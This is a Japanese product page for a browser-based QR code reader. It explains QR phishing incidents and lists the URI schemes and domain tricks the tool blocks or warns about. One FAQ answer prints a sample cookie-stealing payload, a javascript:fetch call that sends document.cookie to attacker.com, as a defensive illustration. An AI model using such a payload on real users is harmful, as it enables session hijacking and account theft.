N2
NanToo
ライフスタイル

QRコード読み取りツール (画像・カメラ対応)

画像アップロードまたはカメラから QR コードを読み取り、内容を解析。javascript: / data: 等の危険スキーム検出、URL 短縮サービス・IP 直接・punycode・同形異字攻撃の警告まで対応。全てブラウザ内で完結、サーバ送信なし。

免責事項: 本ツールは QR コードから読み取った内容の表示・解析を行うのみです。 読み取った内容に起因するいかなる被害 (フィッシング被害、不正アクセス、金銭的損失等) について一切の責任を負いません。読み取り後のリンクアクセス・データ実行は自己責任でお願いします。読み取り処理は全てブラウザ内で完結し、画像もカメラ映像もサーバには送信されません。

または ここに画像をドラッグ&ドロップ (PNG / JPG / WebP)

このツールについて問い合わせる →

QRコード読み取りツール (画像・カメラ対応)について

QR コード読み取りツールとは

本ツールは、画像ファイルまたはカメラから QR コードを読み取り、その内容をセキュリティ警告付きで表示するツールです。読み取った内容は javascript:data: などの危険な URI を自動検出してブロックし、URL の場合は短縮サービス・IP 直接アクセス・同形異字 (homograph) 攻撃などのリスクを警告します。

すべての処理はあなたのブラウザ内で完結します。画像もカメラ映像も外部サーバには送信されません。

免責事項 — 自己責任での利用

本ツールは QR コードの内容を表示・解析するのみで、読み取った内容に起因するいかなる被害についても一切の責任を負いません。読み取った QR コードに含まれるリンクをクリックする・データを実行する等の操作は、すべてご利用者ご自身の自己責任で行ってください。

本ツールが「危険」と判定しなかったコンテンツでも、フィッシングサイト・マルウェア配布サイト等の可能性はゼロではありません。リンク先のドメイン・運営者・通信内容を必ずご自身で確認してから利用してください。

QR コードを使った詐欺・攻撃の実例 (2023-2026)

  • FBI 公式注意喚起 (2023年1月) — Public Service Announcement I-011823-PSA「Cybercriminals Tampering with QR Codes to Steal Victim Funds」で QR フィッシング (quishing) を警告
  • 米テキサス州オースティン・サンアントニオ駐車メーター (2022年〜) — 公的駐車メーターに偽 QR ステッカーが貼られ、フィッシング決済サイトに誘導された事案
  • FTC 消費者警告 (2023年12月) — 「Scammers hide harmful links in QR codes to steal your information」
  • IPA・国民生活センター・警察庁 (日本) — QR 決済悪用、不正サイト誘導、不正送金の注意喚起を継続
  • EV 充電ステーション偽 QR (英国 2023) — 駐車料金を盗むための偽 QR ステッカー
  • レストラン QR メニュー偽装 (米国 2023-2024) — 正規メニュー QR の上に攻撃者の QR ステッカー
  • Quishing-as-a-Service (2024-2025) — ダークウェブで QR 詐欺キットが販売されている

QR コードは「URL を視覚的に隠蔽する」技術なので、ステッカーの差し替えや、メールに画像として埋め込んでフィルタを回避するといった攻撃と相性が良く、近年急増しています。

本ツールが検出する危険・警告

⛔ 即座にブロック (リンクオープン不可)

  • javascript: — クリックでブラウザが任意の JavaScript を実行する典型的 XSS
  • data: — 任意の HTML/JS を埋め込めるためフィッシング表示に悪用
  • vbscript: — IE 用の古い任意コード実行スキーム
  • file: — ローカルファイルへの参照を試みる
  • 異種文字混在ドメイン (Latin + キリル/ギリシャ/CJK) — 同形異字攻撃の可能性が極めて高い

⚠ 警告表示

  • tel: — タップで電話発信、プレミアムレート詐欺
  • sms: / smsto: / matmsg: — SMS 自動送信
  • mailto: — メール作成画面の自動起動
  • intent:// — Android アプリの起動誘導
  • WIFI: — Evil Twin (偽アクセスポイント) への自動接続誘導
  • geo: — 地図アプリで指定座標を開く
  • HTTP (暗号化なし) URL
  • IP アドレス直接アクセス (203.0.113.x 等)
  • punycode (xn--) ドメイン — 多くは国際化ドメインだが偽装の可能性
  • URL 短縮サービス (bit.ly, t.co, tinyurl, etc.) — 最終遷移先が見えない

技術仕様

  • 復号エンジン: ネイティブ BarcodeDetector API (Chrome/Edge) を優先、フォールバックは jsQR (Cosmo Wolfe / Apache 2.0 / 43KB)
  • カメラ: 標準 getUserMedia API、複数カメラ対応 (内蔵/外付け、前面/背面切替)
  • 表示: 全ての文字列出力を React の自動エスケープ (textContent) で行う。dangerouslySetInnerHTML は一切使用しない
  • 制御文字除去: U+0000-U+001F, U+007F を表示前に除去 (改行・タブは保持)
  • ネットワーク: 画像もカメラ映像も外部送信なし。完全クライアント処理
  • HTTPS 必須: カメラ機能はブラウザのセキュリティ制約により HTTPS でのみ動作 (localhost を除く)

対応する QR コード種別

種別 本ツールの判定
URLhttps://example.comHTTPS 必須・各種チェック
Wi-FiWIFI:T:WPA;S:Net;P:pass;;警告表示・自動接続なし
連絡先 (vCard)BEGIN:VCARD ... END:VCARDテキストとして表示
連絡先 (MECARD)MECARD:N:山田;TEL:090...;;同上
電話番号tel:+819012345678警告表示
SMSsms:+8190..., smsto:..., matmsg:...警告表示
メールmailto:test@example.com警告表示
位置情報geo:35.6895,139.6917警告表示
プレーンテキスト任意の文字列表示のみ・リンク化なし

よくある質問

Q. 読み取った画像やカメラ映像はサーバに送信されますか?
送信されません。すべての処理はあなたのブラウザ内 (JavaScript) で完結します。サーバ側には QR の内容も画像も一切渡りません。プライバシーが完全に保たれます。
Q. なぜ「javascript:」や「data:」をブロックするのですか?
これらの URI スキームはブラウザに任意のコードを実行させたり、攻撃者が制御する任意の HTML を表示させたりする手段として悪用されます。たとえば QR が javascript:fetch('https://attacker.com/?c='+document.cookie) を含んでいた場合、誤ってクリックすればブラウザの保存している情報が攻撃者に送られます。本ツールではこれらを自動検出し、リンク化を一切行いません。
Q. URL 短縮サービスはなぜ警告対象なのですか?
bit.ly や t.co などの短縮 URL は、最終的な遷移先のドメインが見えないため、フィッシングサイトを隠す常套手段です。本ツールでは短縮サービスのドメインを検出して警告を出します。クリックする前に必ず元の URL を確認してください (Web 上に複数の URL 展開ツールがあります)。
Q. 「同形異字攻撃 (homograph)」とは何ですか?
ラテン文字の「a」とキリル文字の「а」(U+0430) のように、見た目はそっくりだがコードポイントが違う文字を組み合わせて、本物のドメインに見える偽ドメインを作る攻撃です。例: アップルは「apple.com」ですが、攻撃者が「аpple.com」(キリル文字) を取得すれば、URL バーで判別できないことがあります。本ツールはドメイン内の文字種混在を検出して警告します。
Q. カメラが起動しません
(1) HTTPS 接続でアクセスしているか確認してください (HTTP では動きません、localhost を除く)。(2) ブラウザのアドレスバーのカメラ許可アイコンをクリックして、本サイトに対するカメラ許可を確認してください。(3) 別のアプリ (Zoom など) がカメラを使用していないか確認してください。
Q. QR が読み取れません
画像が暗い・小さい・歪んでいる場合は読み取れないことがあります。もう少し明るく、鮮明に撮影し直してください。カメラモードで読み取る場合は、QR とカメラの距離を 15-30 cm 程度に保ち、スマホやデスクライトで明るく照らすと精度が上がります。
Q. 本ツールが「安全」と判定したリンクは絶対に安全ですか?
いいえ。本ツールは URI スキーム・ドメイン形式・既知のリスクパターンをチェックしますが、「正常な HTTPS URL」の中身がフィッシングサイトであるかどうかまでは判断できません。クリック前にドメイン (eTLD+1) を必ず目視確認し、見覚えのない名前であれば慎重に判断してください。本ツールは判定結果について一切の責任を負いません。
このツールを評価
(0件)